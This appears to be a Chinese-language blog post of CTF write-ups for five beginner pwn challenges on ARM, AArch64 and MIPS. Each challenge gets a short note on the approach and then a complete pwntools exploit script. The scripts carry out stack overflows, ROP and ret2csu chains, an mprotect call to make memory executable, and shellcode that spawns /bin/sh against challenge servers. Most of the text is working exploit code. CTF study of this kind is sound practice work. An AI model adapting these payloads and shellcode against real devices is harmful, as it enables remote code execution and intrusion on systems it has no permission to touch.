前言:
记录一下最近做的几道异构入门题
jarvisoj_typo:
32位arm,静态链接,本地测出偏移后rop即可
注意的是因为去掉了符号表所以system函数可能需要找一会儿,可以使用xref找
exp:
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",27348]
#libc = ELF('')
#elf = ELF('')
if len(sys.argv) == 1:
# context.log_level="debug"
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
# io = process(["qemu-aarch64", "-L", ".", "./stack"])
io = process(["qemu-arm-static", "-g", "1234", "./typo"])
# io = process("")
context(arch='arm', os='linux',bits='32')
# context.terminal['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
io = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
str_sh=0x6c384
sys_addr=0x110b4
payload=cyclic(0x200)
io.sendafter(b"t\n",b"\n")
# io.send(payload)
#offset 112
#0x00020904: pop {r0, r4, pc};
payload=cyclic(112)+p32(0x20904)+p32(str_sh)*2+p32(sys_addr)
io.sendafter(b"\n",payload)
io.interactive()
shanghai2018_babyarm:
aarch64动态链接,开启nx,存在mprotect函数可以开rwx段写shellcode
注意一下老生常谈的布栈问题
exp:
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",25721]
#libc = ELF('')
elf = ELF('./pwn')
if len(sys.argv) == 1:
# context.log_level="debug"
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
# io = process(["qemu-aarch64", "-L", ".", "./stack"])
io = process(["qemu-aarch64-static", "-g", "1234", "./pwn"])
# io = process("")
context(arch='aarch64', os='linux')
# context.terminal['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
io = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
context(arch='aarch64', os='linux')
#context(arch = 'amd64', os = 'linux')
csu_2=0x4008CC
# LDP X19, X20, [SP,#var_s10]
# LDP X21, X22, [SP,#var_s20]
# LDP X23, X24, [SP,#var_s30]
# LDP X29, X30, [SP+var_s0],#0x40
# RET
#RET 跳转的是X30保存的地址,X30存放返回地址
csu_1=0x4008ac
# LDR X3, [X21,X19,LSL#3] 此处控制X19值为0即可将X21值赋值给X3
# MOV X2, X22
# MOV X1, X23
# MOV W0, W24
# ADD X19, X19, #1
# BLR X3
# CMP X19, X20
# B.NE loc_4008AC
mprotect=elf.plt[b"mprotect"]
# STP X29, X30, [SP,#-0x10+var_s0]!
# MOV X29, SP
# MOV W2, #0 ; prot
# MOV X1, #0x1000 ; len
# MOV X0, #off_411000 ; addr
# BL .mprotect
# NOP
# LDP X29, X30, [SP+var_s0],#0x10
# RET
tar_addr=0x411068
io.sendafter(b"Name:",p64(mprotect)+asm(shellcraft.sh()))
# payload=cyclic(0x48)+asm(shellcraft.sh())
payload=cyclic(0x48)+p64(csu_2)
payload+=p64(0)+p64(csu_1) # X19->0 X30->csu_1
payload+=p64(0)+p64(1) # X19->0 X20->1
payload+=p64(tar_addr)+p64(7)+p64(0x1000)+p64(tar_addr+8) # X3->X21->tar_addr X2->X22->7 X1->X23->0x1000 W0->W24(X24)->tar_addr+0x8
payload+=p64(0)+p64(tar_addr+0x8) # mprotect X29->0 X30->tar_addr+0x8
io.sendline(payload)
io.interactive()
axb_2019_mips:
mips是关闭了nx的,可以构造read将shellcode读入bss段然后跳转到bss段执行
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",27635]
#libc = ELF('')
#elf = ELF('')
if len(sys.argv) == 1:
# context.log_level="debug"
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
# io = process(["qemu-aarch64", "-L", ".", "./stack"])
io = process(["qemu-mipsel-static", "-g", "1234","-L",".","./pwn2"])
# io = process("")
context(arch='mips',endian='little', os='linux',bits='32')
# context.terminal['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
context(arch='mips',endian='little', os='linux',bits='32')
io = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
shellcode=asm(shellcraft.sh())
bss_addr=0x410c00
read_text=0x4007e0
io.sendafter(b"name: \n",b"aaa")
# payload=cyclic(0x200)
#offset 36
# # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
# for i in range(29):
# payload += b"\x26\x40\x08\x01"
payload=cyclic(0x20)+p32(bss_addr)+p32(read_text)
io.sendafter(b"aaa",payload)
sleep(1)
payload=cyclic(0x24)+p32(bss_addr+0x40)+b"\x26\x40\x08\x01"*20+shellcode
io.send(payload)
io.interactive()
ycb_2020_mipspwn:
mipsel,打法同上,向bss段写入shellcode跳转执行
此题需要限制一下shellcode长度,使用shellcraft生成的过长了
可以上exdb找:https://www.exploit-db.com/shellcodes/13300
exp:
from pwn import *
import sys
remote_addr = ["node4.buuoj.cn",26964]
#libc = ELF('')
#elf = ELF('')
if len(sys.argv) == 1:
# context.log_level="debug"
#io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
# io = process(["qemu-aarch64", "-L", ".", "./stack"])
# io = process(["qemu-mipsel-static", "-g", "1234","-L",".","./pwn2"])
io = process(["qemu-mipsel-static", "-g", "1234","./pwn2"])
# io = process("")
context(log_level='debug',arch='mips',endian='little', os='linux',bits='32')
# context.terminal['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
context(arch='mips',endian='little', os='linux',bits='32')
io = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
bss_addr=0x411700
read_text=0x400f50
io.sendafter(b"here:\n",b"aaa")
io.recv()
io.sendline(b"7")
#payload=cyclic(0x200)
#offset 60
payload=cyclic(56)+p32(bss_addr)+p32(read_text)
io.sendafter(b"feeling:\n",payload)
shellcode=b"\xff\xff\x10\x04\xab\x0f\x02\x24"
shellcode+=b"\x55\xf0\x46\x20\x66\x06\xff\x23"
shellcode+=b"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
shellcode+=b"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
shellcode+=b"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
shellcode+=b"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
shellcode+=b"/bin/sh"
payload=b"a"*60+p32(bss_addr+88)+shellcode
io.send(payload)
io.interactive()
hkcert2023_rop:
mips,构造gets往可写段上写shellcode,再找gadget跳过去,最后溢出跳转
from pwn import *
import sys
remote_addr = ["chal.hkcert23.pwnable.hk",28151]
#libc = ELF('')
#elf = ELF('')
if len(sys.argv) == 1:
context.log_level="debug"
p = process(["qemu-mips-static", "-L", ".", "-g","1234","./rop"])
elf=ELF("./rop")
# p = process(["qemu-mips-static", "-L", ".", "./rop"])
# p = process("./rop")
context(arch='mips',endian='big',bits='32',os='linux')
context.terminal = ['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
context(arch='mips',endian='big',bits='32',os='linux')
p = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
#context(arch = 'amd64', os = 'linux')
# gdb.attach(p)
# pause()
nop=b"\x01\x08\x40\x26"
shellcode = asm('''
lui $t7, 0x2f2f
ori $t7, $t7,0x6269
lui $t6, 0x6e2f
ori $t6, $t6, 0x7368
sw $t7, -12($sp)
sw $t6, -8($sp)
sw $zero, -4($sp)
addiu $a0, $sp, -12
slti $a1, $zero, -1
slti $a2, $zero, -1
li $v0, 4011
syscall 0x040405
''')
# LAB_00456c34 XREF[1]: 00456c20(j)
# 00456c34 8f bf lw ra,local_4(sp)
# 00 5c
# 00456c38 8f a2 lw v0,local_3c(sp)
# 00 24
# 00456c3c 8f b3 lw s3,local_8(sp)
# 00 58
# 00456c40 8f b2 lw s2,local_c(sp)
# 00 54
# 00456c44 8f b1 lw s1,local_10(sp)
# 00 50
# 00456c48 8f b0 lw s0,local_14(sp)
# 00 4c
# 00456c4c 03 e0 jr ra
# 00 08
gets_text=0x400820
payload=flat(
{
0x24:p32(0x49cc20),
0x4c:p32(0),
0x5c:p32(gets_text),
}
)
p.sendlineafter(b"input : \n",b"a"*72+p32(0x49cc20)+p32(0x456c34)+payload)
p.sendline(shellcode+cyclic(0x64-len(shellcode))+p32(0x49cc20))
p.interactive()